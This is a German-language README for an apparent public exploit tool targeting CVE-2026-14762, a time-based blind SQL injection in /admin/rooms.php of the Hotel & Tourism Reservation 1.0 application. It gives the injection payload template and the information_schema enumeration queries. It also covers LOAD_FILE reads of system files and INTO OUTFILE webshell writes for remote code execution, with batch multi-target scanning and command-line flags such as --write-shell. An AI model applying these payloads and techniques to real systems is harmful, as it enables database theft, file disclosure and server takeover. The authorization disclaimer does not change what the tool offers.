
Multithread-fähiger zeitbasierter Blind-SQL-Injection-Exploit für CVE-2026-14762, der auf Hotel & Tourism Reservation 1.0 abzielt. Zählt Datenbanken, Tabellen, Spalten auf; liest Dateien über LOAD_FILE; schreibt PHP-Webshells für RCE. Unterstützt Proxy, Batch-Scanning und interaktive SQL-Shell.
Vollständig ausgestatteter, multithreaded, zeitbasierter Blind-SQL-Injection-Exploit für CVE‑2026‑14762.
Zielt auf den Endpunkt /admin/rooms.php der Anwendung Code‑Projects Hotel & Tourism Reservation (Version 1.0) ab.
Ermöglicht vollständige Datenbankaufzählung, Dateisystem-Lesen (LOAD_FILE) und beliebiges Dateischreiben (INTO OUTFILE / DUMPFILE) – was zu Remote-Code-Ausführung durch Webshell-Bereitstellung führt.

| Kategorie | Fähigkeit |
|---|---|
| Schwachstelle | Zeitbasierte Blind-SQL-Injection (CWE‑89) |
| Angriffsvektor | GET /admin/rooms.php?delete=<payload> |
| Ausnutzung | Bedingte SLEEP()-Injektion mit Binärsuche-Zeichenextraktion |
| Datenbank | Aktuellen Datenbanknamen extrahieren |
| Schema | Tabellen- und Spaltenaufzählung über information_schema |
| Datenauszug | Vollständiger Tabellenexport (JSON) – unbegrenzte Zeilen, konfigurierbares Limit |
| Dateilesen | LOAD_FILE() – jede von MySQL lesbare Datei lesen (z.B. /etc/passwd, Konfigurationsdateien) |
| Dateischreiben | INTO OUTFILE / DUMPFILE – PHP-Webshell, Backdoor oder beliebigen Inhalt schreiben |
| Interaktive Shell | Live-SQL-Shell (zeitbasierte Extraktion) für manuelle Abfragen |
| Einzelabfrage | Ad-hoc-SQL ausführen und Ergebnisse abrufen (512‑Zeichen-Limit) |
| Batch-Modus | Multi-Target-Scanning mit konfigurierbarem Thread-Pool (ThreadPoolExecutor) |
| Proxy-Unterstützung | HTTP/HTTPS-Proxy (Burp Suite, mitmproxy, usw.) |
| Ausführliche Protokollierung | Farbige Ausgabe mit Zeitstempel-Debug-Informationen |
| Keine Abhängigkeiten | Nur requests, urllib3 und colorama (optional) |
requestsurllib3colorama (optional – für farbige Terminalausgabe)Alle Abhängigkeiten installieren mit:
pip install requests urllib3 colorama
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git
cd CVE-2026-14762-PoC-Exploit
chmod +x exploit.py or basic_exploit.py
| Argument | Kurzform | Typ | Standard | Beschreibung |
|---|---|---|---|---|
--target | -t | URL | — | Einzelne Ziel-URL (z.B. http://192.168.1.100) |
--target-file | -l | Datei | — | Datei mit Liste von Zielen (eine pro Zeile) |
--threads | — | Ganzzahl | 5 | Anzahl der Threads für Multi-Target-Scanning |
--output | -o | Pfad | — | Ausgabedatei (JSON für Dumps, Rohtext für Dateien) |
--verbose | -v | Flag | False | Ausführliches Debug-Logging aktivieren |
--proxy | — | URL | — | HTTP/HTTPS-Proxy (z.B. http://127.0.0.1:8080) |
--user-agent | -ua | Zeichenkette | Mozilla/5.0... | Benutzerdefinierter User-Agent-Header |
--delay | — | Fließkommazahl | 5.0 | Schlafzeit in Sekunden für Blind-Injection |
--max-retries | — | Ganzzahl | 3 | Maximale Anzahl erneuter Anfrageversuche |
Der Parameter delete wird injiziert mit:
150' AND IF(<condition>, SLEEP(<delay>), 0) AND '1'='1
Die IF() wertet die Bedingung aus; bei true schläft die Datenbank für Sekunden.
Für jede Zeichenposition wird eine Binärsuche über den ASCII-Bereich (32–126) durchgeführt, die mit > und = Vergleichen das korrekte Zeichen ermittelt. Dies reduziert die Anfragen von 95 pro Zeichen auf etwa 7–8 und macht die Extraktion äußerst effizient.
Datenbankname: SELECT DATABASE()
Tabellen: SELECT table_name FROM information_schema.tables WHERE table_schema='<db>' LIMIT n,1
Spalten: SELECT column_name FROM information_schema.columns WHERE table_schema='<db>' AND table_name='<table>' LIMIT n,1
SELECT <col> FROM <table> LIMIT row,1 – extrahiert Zeile für Zeile
Jede Zelle wird Zeichen für Zeichen mit derselben Binärsuche-Technik extrahiert
Lesen: LOAD_FILE('/path/to/file') – erfordert, dass secure_file_priv leer ist oder auf das Zielverzeichnis zeigt
Schreiben: SELECT '<content>' INTO OUTFILE '/path/to/shell.php' – erfordert FILE-Berechtigung und dass secure_file_priv nicht restriktiv ist
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests, Bildungsforschung und Schwachstellenbewertung bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch, illegale Aktivitäten oder Schäden, die durch diese Software verursacht werden.
Holen Sie vor dem Testen stets die ausdrückliche schriftliche Genehmigung des Systembesitzers ein.
--ssl-verify| — |
| Flag |
False |
| SSL-Zertifikatsüberprüfung aktivieren |
--webroot | — | Pfad | /var/www/html | Webroot für INTO OUTFILE Webshell-Schreibvorgänge |
--dump-db | — | Flag | False | Alle Tabellen aus der aktuellen Datenbank ausgeben |
--tables | — | Flag | False | Nur alle Tabellennamen auflisten |
--dump-table | — | Tabelle | — | Eine bestimmte Tabelle ausgeben (z.B. --dump-table users) |
--read | — | Pfad | — | Eine Datei über LOAD_FILE() lesen |
--write-shell | — | Flag | False | PHP-Webshell (shell.php) in Webroot schreiben |
--sql | — | Abfrage | — | Eine einzelne SQL-Abfrage ausführen (maximal 512 Zeichen) |
--interactive | -i | Flag | False | Interaktive SQL-Shell nach der Ausnutzung starten |